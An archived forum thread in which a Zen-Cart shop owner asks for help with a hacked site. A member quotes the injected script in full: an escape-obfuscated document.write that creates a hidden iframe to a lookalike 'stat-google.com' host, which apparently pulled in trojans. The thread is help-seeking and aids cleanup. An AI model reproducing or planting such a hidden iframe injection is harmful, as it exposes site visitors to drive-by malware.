Archive for Downsizer For an ethical approach to consumption
 


       Downsizer Forum Index -> IT Matters
Grimnir

My site has a virus :(

I need some help with my site, it's been hacked and is producing virus warnings. It's based on the Zen-Cart software using php and while I can just about manage to follow the instructions on customising and configuring it I don't know enough to know where to look for a virus.

Any suggestions/help would be very appreciated.
jema

A link to the site would help.
Grimnir

www.heathenpeddler.co.uk/tees
jema

What makes you sure it is hacked, I see an odd script but it seems harmless enough as it just generates a google iframe to:

stat-google.com
MarkS

Code:
script type="text/javascript"
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u002d\u0067\u006f\u006f\u0067\u006c\u0065\u002e\u0063\u006f\u006d\u002f\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002f\u006f\u0075\u0074\u002e\u0070\u0068\u0070\u003f\u0073\u005f\u0069\u0064\u003d\u0031\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0020\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u003b\u0020\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')


this script after the html?
sean

Congratulations on the widest post in the history of downsizer. Wink
Jonnyboy

WTF has ''latest posts'' gone? Wink
Jamanda

Jonnyboy wrote:
WTF has ''latest posts'' gone? Wink


About half a mile to the right.
The quotes button is the full mile.

Edited because I don't know my right from my left Embarassed
Jonnyboy

Do you mean right?
Jamanda

You beat me Laughing
sean

Her school didn't do GCSE Handedness. Wink
Grimnir

MarkS - where did you find that script? I'm trying to find the affected file but apart from the redirector I use on the root directory I haven't found it yet :S

*edit* Never mind, found the script and removed it - I hope!

I've found out it's downloading something from "check/n14041.htm" (not putting the full url in as it's a definite baddie). It loads a connector to the net and downloads trojans and other viruses. A good virus checker usually catches it but that's not the point is it?
MarkS

is stat-google really google though?

I just did a quick look and it resolves to an IP in Malaysia....
vegplot

Has Zen Cart issued a security update to prevent this from happening?
jema

MarkS wrote:
is stat-google really google though?

I just did a quick look and it resolves to an IP in Malaysia....


That is certainly the question! and whilst whois suggests it is, I'm skeptical. certainly unless you know a weird iframe is there for a legit reason, it should be removed.
Grimnir

There shouldn't be any links to any external sites except for the banner ads at the bottom of the page, so it definitely isn't meant to be there. I think I've found the culprit, at least it's not popping up a virus warning now so hopefully it's ok
       Downsizer Forum Index -> IT Matters
Page 1 of 1
You must set the ad_network_ads_377.txt file to be writable (check file name as well).